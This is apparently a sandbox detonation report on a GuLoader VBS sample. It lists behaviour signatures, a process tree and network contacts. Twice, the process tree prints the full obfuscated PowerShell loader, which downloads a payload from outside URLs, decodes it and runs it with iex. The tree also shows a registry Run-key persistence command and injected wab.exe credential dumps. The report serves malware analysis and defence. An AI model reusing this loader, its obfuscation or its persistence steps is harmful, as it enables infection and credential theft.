Analysis Overview
SHA256
b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79
Threat Level: Known bad
The file b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs was found to be: Known bad.
Malicious Activity Summary
Guloader,Cloudeye
Blocklisted process makes network request
Checks computer location settings
Adds Run key to start application
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Program crash
Modifies registry key
Suspicious use of UnmapMainImage
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-09 18:54
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-09 18:54
Reported
2024-07-09 18:56
Platform
win10v2004-20240709-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Guloader,Cloudeye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Algoritmiskes = "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\\Coindication\\').Fyrsvamp;%Paginerende% ($elektronspillets)" | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
Enumerates physical storage devices
Program crash
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. ';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. ';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rzbivks"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ctganddgxs"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mvltovwilahgiw"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3272 -ip 3272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2904 -ip 2904
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 400 -ip 400
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 12
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rendl"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\uyanmfeoj"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4264 -ip 4264
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\eafgnxoixvow"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5116 -ip 5116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1352 -ip 1352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5116 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 12
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\yityrwjukssqvydvandjmigzvicenqsn"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\jkgq"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\lembkhe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2844 -ip 2844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3348 -ip 3348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4252 -ip 4252
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3348 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 12
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\gtiapoyaaegbtlsibnyfqbzhygi"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qnnligjuwmyfesgmlxlyaguqymzijc"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2428 -ip 2428
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\apsdiruwkvqkggcyciyalsohhtjrcnjkn"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2008 -ip 2008
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4348 -ip 4348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2428 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 12
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\veovnxghxrveshhevumtbt"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xytnfqrblznicnvimfymegnyb"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1008 -ip 1008
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ibzygicczhfvftrmwqtoplhhbrpv"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4692 -ip 4692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4660 -ip 4660
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1008 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 12
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nkailzhhjmbtbijwgfui"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\pefaesrjwutydoyixqhcsma"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4648 -ip 4648
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zgttfkcdkcllovumhatdvqvyewm"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1228 -ip 1228
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1088 -ip 1088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 12
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ungkjjxoyzpfawy"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\epmvcbhqmhhjckmwrxu"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hkzodusjapaomqiaiihrhr"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4556 -ip 4556
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2804 -ip 2804
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2104 -ip 2104
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 12
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bznfhsmvvl"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ltayalxwjuwuax"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 1700 -ip 1700
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wvgqadiqxcozldpwc"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1556 -ip 1556
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1680 -ip 1680
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1556 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1680 -s 12
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qktifk"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tehsfdfdz"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3292 -ip 3292
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\dgmlyvqxnock"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2260 -ip 2260
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3340 -ip 3340
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3292 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3340 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 12
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ipnv"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\sktnwff"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vmyyxxqfyj"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2436 -ip 2436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2696 -ip 2696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3932 -ip 3932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 12
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2696 -s 12
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | moviesmacktalk.com | udp |
| RO | 89.42.218.27:443 | moviesmacktalk.com | tcp |
| US | 8.8.8.8:53 | 27.218.42.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
